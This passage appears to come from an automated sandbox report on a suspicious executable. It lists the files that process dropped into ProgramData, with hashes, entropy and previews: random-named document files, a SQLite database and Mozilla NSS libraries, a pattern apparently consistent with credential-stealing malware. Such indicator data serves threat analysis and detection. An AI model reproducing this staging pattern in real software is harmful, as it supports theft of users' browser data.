Malicious:	false
Reputation:	unknown
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\ProgramData\KEBFHIJECFIDGDGCGHCG

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KLIZUSIQEN.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696703751818505
Encrypted:	false
SSDEEP:
MD5:	19255ED5D4F37A096C105CEF82D0F5C0
SHA1:	96C5E995A91C8BC479E1C2ADB32C7E022EB8FAC7
SHA-256:	A0E9C6A5B14DB7AB22994C5017930720299F4492CE99D95A07BEB46BF2BAE7E8
SHA-512:	CDCD7E54677DE3BCE65BD80C855DE9684517F931ECA4D17E984C1D02E5E5CE9B50582ECCFA43F71A4F0A4E1743D74FCF3D588424AF519BFAE628EA49082C6E68
Malicious:	false
Reputation:	unknown
Preview:	KLIZUSIQENZWQAFPHPIZMRSSYSYIINGOAPFQHPCFTPTNYLSNMTRTDZSWEBKDRHIUFOFGWKTHENHAQWTYTMOJNOWPWJAPIZKOPDMUAKVTHXYWDBHBVWDTBCFVXJHDCUGTPASHSDSKUVYPRPPUXKURDNZYJENQKRHCARIUAOIAFRFWGQDXOAPXUJAUWRVEASXCVARWJMIPINSQDPGOWLRMNRCAEZGZIYDWBEWCOJWHLMOUROGZKCFGXDKPHAJADQCYUZYSYXQOIEGZIJWZLUJEKZUASKHQOGVFGVEXIQTENJDEKERNBPZGKNXWYZVXDDAYNSFBZAKWCEEYDSJONDKOYOBSAVICMHPZZRHRLNYDOIDQNYLXFDCCUOIJANPQCOIJDXFLDMIBVHBYSNYGAVWTHYCIPBRPTWSQXWXZZJBFNAUOMALKDRYIMJCRJXXQXCEREPQGNQHHOFEMEOXMSZEWOLTOLCOUCQNPRIPXUSVZNATFZKIJQZKGKTCYOMBXFTSXBXYIHMOONWWGRKPSNEMONASEFSVWNWIBXDSMEKQJIDCFPVMGAAUPBVOYAIKYQEFVSXOFTEMHNXVNMMENORLDYPZUSILNZRPHITCWDQMLEFZOEGPJDXQLBSIYRONLBYOSJVTEMBHNVXCMMRDVOAYSMNNRKRLBSQBIWIWHYUMBKTIYQTROZKTGZZMEFWINSQAXMWWLRRSPXAQZURXOTMUHPNLOUWMXRQSGXIAQILQCZUUTRJZVRNLBSHADNHZSDOQIYIZCEZHFRITTHSZOSBZGNCQVHXSFZJCEVSJCZZYTCFXLNBKMTPXYHPDXMMMXHUAAQWYYFHMKXWZBXZBWKFQHLPMVMGYFZBMVSYGKGTOLLJCBFKHHWFIVPPXPTVEJEBZBXHKNYKDYLIAKLLPJZFPVJAROJUOZZUWNZRRDZNYLGBHMNWUKJLSAXBUBWJZYCMVLYBCQJLBOROBDSZGHMCIASVUCVNDTGDALKYLTOMJK

C:\ProgramData\NHPKIZUUSG.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.70435191336402
Encrypted:	false
SSDEEP:
MD5:	8C1F71001ABC7FCE68B3F15299553CE7
SHA1:	382285FB69081EB79C936BC4E1BFFC9D4697D881
SHA-256:	DCC1D5A624022EFCE4D4A919041C499622A1213FD62B848C36E6252EE29B5CAE
SHA-512:	8F2124445F7856BFFBB3E7067135CFA70BFB657F8CEAEE89312CF15CFA127CACF28C2F1F9CD1CC64E56A8D8C248E237F2E97F968D244C457AD95D0AD5144E2A7
Malicious:	false
Reputation:	unknown
Preview:	NHPKIZUUSGERQSLBGSEAVXGNDWXNHRIMGKQZIYGMNAKLDSDLMZTSHWNQSMRLTOXKIQVZWPTPMYGCCCTOQMOFGPYVVCCUDORIXMMXDHKCETULBHLJENABEIJPTFOHFPIUUSFPUHSBHENDANFMOYZRZAXYVFEZIKDKUEVZAWEFKRTUJZPFUDMEZZQVBGYMMIHKEBYJMJMTTXSDTDQAUATXLABLBEJUBBPSXZPXMHVNHOHYPKCYLDVGJSBPEXWGYVPHWPWLYJIOFFNQHAOBSRORLXUKIHEETKPFDPHQAGTKOMEWPBYGMTXHOQFINPIQARIVGCFUFIETTFUMCUDHRHCSTIZWRDJEHWOLAFOSWAVIGSWONBSKFWHCQAGHLWBKAFUQUULJRVZNUGGVOCCVTTWZEZFPJKZDJMHDYXQKDPLRECPAAEZVBXFDGZJIUGNMOEAISGBSPVTDRADHODLAXUFWZVTJPIGKERLENNAJHHHNNAPBWXCOGJSNVQJJEEPSMESQKGYOHXVMZQNSMSJHQHSGCJZCBZJXMLGNQQKZRIQSQCAWXZFCRMGMMLKHZDWNQTXPTYWGWNQQEQWEZJPQVPOASQIIJYWPUVLHFSLMGHWITYEKRNYGXYTAJZSRGYUWTMRNOICIEPMAYUOIDDOUSYSPAILYQQLYDTBOTEDGSCNXDRRQMOBWCQMDCQXTPEXDKPLVRMFZSKERSAULAYLSOJGDMFTZECKZYYLQVVDOMXISCOBUPPSAYUFOWOCBDJALHRAXDIKEMRYGQMEYTENAHXKWSVJEDEJTIUWZDHLIBKQRVMQLSAYIIOZDWWOLHCJUVJVRYJLTIENWCTYDOSJVSFUHOQPOXCMFGTAWFRCZJNYBCRPUFRUMZIBQDOVOBMFCHMMFHSSJZDCZNMWNCNSQMZWHCOEYNCAFONSABBQCKAPFWJIGKNUCUJZWUKRWIOFVWQWFSYAHDWXEMJKFZYMRVIRAMPVKBXONBJFTXIBDAYIE

C:\ProgramData\NIKHQAIQAU.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690394987545919
Encrypted:	false
SSDEEP:
MD5:	CA901F8E74EB7955CF06A00BD424C0C2
SHA1:	0876F92A018E8AB57F666FBB048B1CD028607A38
SHA-256:	6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
SHA-512:	7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
Malicious:	false
Reputation:	unknown
Preview:	NIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNODZEVLZHOZSPIROLEDDZIVDLRTCVHZIXTARRYNQXDSJTZFOOYHUCROZUVPHMDRIWZWYNOATHQMKGZMPPIBYIAXUSGLYFPQTHUARHNEBTECYTUUCXJOESOPPKVXGBHXGPHIYJEJAYBFOVPMDVWEZNFBQJKZAWGCIWNFBSDPSSBBQTNYDJVQTTPUWPOOTVYKITOESDZWHOTFCZIQUYASDBGWAPMXAFIGQFPGWTRNBMHCXAZNMKIOSHYBMTSDERCDBFQSLEBTIGMCRUGZJZQAMYIFXIHLBUBWXCKIQTVQNMYMUYZWTTRQAVEAQFTTDTEFYTIXVPFUZALHHYLJHLNOFTPHODDWSFLBPCVKNDNFYPRHRVBHZSKKAJYBRTRWEHCIAZYAWYXGIRJSURFADGDZBTKMLEAYICWBYEAKNBIIDMQKZIXOLIQHETRIJJOSQDVZXKTZOMXOXGKIEJJNUHMCNVBNTYVETDBZHKYQLQYJBSUUNGMIURLIIINJAVXYNHTVSYTVBSAGNGQGUYADHTCDXNDKQFKCMHFRLWQZMSHDZEBEGPOSOPFUUHIVYBVXTLHFYHMHALQHNIUKMTKRBYZDOEALSNTXJRYMEETOQRISFEOVJSBVNMZFHXIDWOPIZKHISVTXVHAUPHEUOQLFVPNKREKEFDTLOWUVDKPDDCBKKSSGLLJSGVCAKVVFFKUKYVELNQTKZZRSDNEKDHUGDQWFBGFQMTINSXDOXPQOPZWHRDBBIZNGWLXSHCGVIBTIQEUTFYRIYKHRANDXVFREQPDFPRAKAFCQSRGTEIQGEAVDTJRESPBHYVTTLHWYQSKOZIBJZRSUJETZFCGMBHNYUSWWAENDXQUJFMLWZXGNLDFLSRZJBBJCPWKHFZXEVBDCLKULDSDXUFVEWFBMUMFQQONCJFFBARKNAVJ

C:\ProgramData\NIKHQAIQAU.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690394987545919
Encrypted:	false
SSDEEP:
MD5:	CA901F8E74EB7955CF06A00BD424C0C2
SHA1:	0876F92A018E8AB57F666FBB048B1CD028607A38
SHA-256:	6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
SHA-512:	7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
Malicious:	false
Reputation:	unknown
Preview:	NIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNODZEVLZHOZSPIROLEDDZIVDLRTCVHZIXTARRYNQXDSJTZFOOYHUCROZUVPHMDRIWZWYNOATHQMKGZMPPIBYIAXUSGLYFPQTHUARHNEBTECYTUUCXJOESOPPKVXGBHXGPHIYJEJAYBFOVPMDVWEZNFBQJKZAWGCIWNFBSDPSSBBQTNYDJVQTTPUWPOOTVYKITOESDZWHOTFCZIQUYASDBGWAPMXAFIGQFPGWTRNBMHCXAZNMKIOSHYBMTSDERCDBFQSLEBTIGMCRUGZJZQAMYIFXIHLBUBWXCKIQTVQNMYMUYZWTTRQAVEAQFTTDTEFYTIXVPFUZALHHYLJHLNOFTPHODDWSFLBPCVKNDNFYPRHRVBHZSKKAJYBRTRWEHCIAZYAWYXGIRJSURFADGDZBTKMLEAYICWBYEAKNBIIDMQKZIXOLIQHETRIJJOSQDVZXKTZOMXOXGKIEJJNUHMCNVBNTYVETDBZHKYQLQYJBSUUNGMIURLIIINJAVXYNHTVSYTVBSAGNGQGUYADHTCDXNDKQFKCMHFRLWQZMSHDZEBEGPOSOPFUUHIVYBVXTLHFYHMHALQHNIUKMTKRBYZDOEALSNTXJRYMEETOQRISFEOVJSBVNMZFHXIDWOPIZKHISVTXVHAUPHEUOQLFVPNKREKEFDTLOWUVDKPDDCBKKSSGLLJSGVCAKVVFFKUKYVELNQTKZZRSDNEKDHUGDQWFBGFQMTINSXDOXPQOPZWHRDBBIZNGWLXSHCGVIBTIQEUTFYRIYKHRANDXVFREQPDFPRAKAFCQSRGTEIQGEAVDTJRESPBHYVTTLHWYQSKOZIBJZRSUJETZFCGMBHNYUSWWAENDXQUJFMLWZXGNLDFLSRZJBBJCPWKHFZXEVBDCLKULDSDXUFVEWFBMUMFQQONCJFFBARKNAVJ

C:\ProgramData\QCFWYSKMHA.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.702247102869977
Encrypted:	false
SSDEEP:
MD5:	B734D7226D90E4FD8228EE89C7DD26DA
SHA1:	EDA7F371036A56A0DE687FF97B01F355C5060846
SHA-256:	ED3AE18072D12A2B031864F502B3DA672B4D4FA8743BEC8ADE114460F53C24D6
SHA-512:	D11ED908D0473A6BEA78D56D0E46FC05DAE642C6ED2F6D60F7859BB25C596CDAA79CC7883FEA5C175A2C04BD176943FF45670B19D6A55B3D5F29FAF40A19AC20
Malicious:	false
Reputation:	unknown
Preview:	QCFWYSKMHARLAFTMDAYCDPDNVLLXYAHYJQVDDKWMWZXTODMVQHOWYAKZGPKJEHLDEADLWAOYFHCRBONQYOLNJKXLXXPSVNNBUMGSSHSRYIKKLNWBJSSZQFZBFWIPYYALBWYXPUCHCBPPPRVICZHAAXDBSBDAFSJSLRPZCKMILDLKTZJTTJWTRDUXPIOSWYRPJKVLJAGHSGEPPERRAQLAJLIRGZPORRNBHIKYMYWHJJKNXIQOPDJPXFLFPWXDCSZYFDTACTIFVHTTSPLEYMJQGMJBZKBTPKCSRPHSAJZDKKKDYFDICXMYAQSFGBCKRXTFXXUYCXPOOHXIGGOZQXUOJXGUHUEOJLEOQQRFQRNQSWAOWAWOUVFMKBPTZVBCGRCYEHPXUWCDBHICKJYVGTNPPMEWNTSWYZNREIVBOXSICNBJXTOOMRYUPEHBVWMTIZHWLGFFTIUYFBQKZOWLOZMSGJFBUHXKMGISFGKCABOUUUQJAUODQPPYPQJGLZVADLCCGHPBEUWSDDXYCCQVTRQWCEJDTNAGHKGJTRWVAQBQJBUQWMJRXXASIQFFIUCPKMEXTJTVBDCBEYZDLKHCHQXMUBNRVRITBTYGULZYWAXVJAXNQEPONBFIAUWZCXQYHHPHZWKKUTNXAQELCSUFKXKKQLLKNVNOREOWTEVCFHSUGPNRMAPAFPTHPGPAJPOCFBZXTIYQYUSEJFOUEZDUJSRXDHTOZAMMNCCIXWLXFQZALVARMPTDBNFJAJUMFQAHUJVWMEIDRIMZQXYHMCNBVLONHTHCXFAKSQBBXFBBFYSTIWNRKGOIHMIHZKIQSYCSFIRGLYFATERWSKAZLTFNMKHFVBLMXNERMNYZHBEYHNFPIPCGHZZMBNNYITUETKSXMZHNSGROLAGIITATFDCBZCBLYQHHYFPBDWGCTQNYPHDHFBNVEJJDIVMSPKDXKQBUNSMLJDVGOKQUEVKEVEUUSGEQJDKGYLPIDXNBIPBAJRUU

C:\ProgramData\VLZDGUKUTZ.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Reputation:	unknown
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\ProgramData\XZXHAVGRAG.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Reputation:	unknown
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\ProgramData\XZXHAVGRAG.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Reputation:	unknown
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Reputation:	unknown
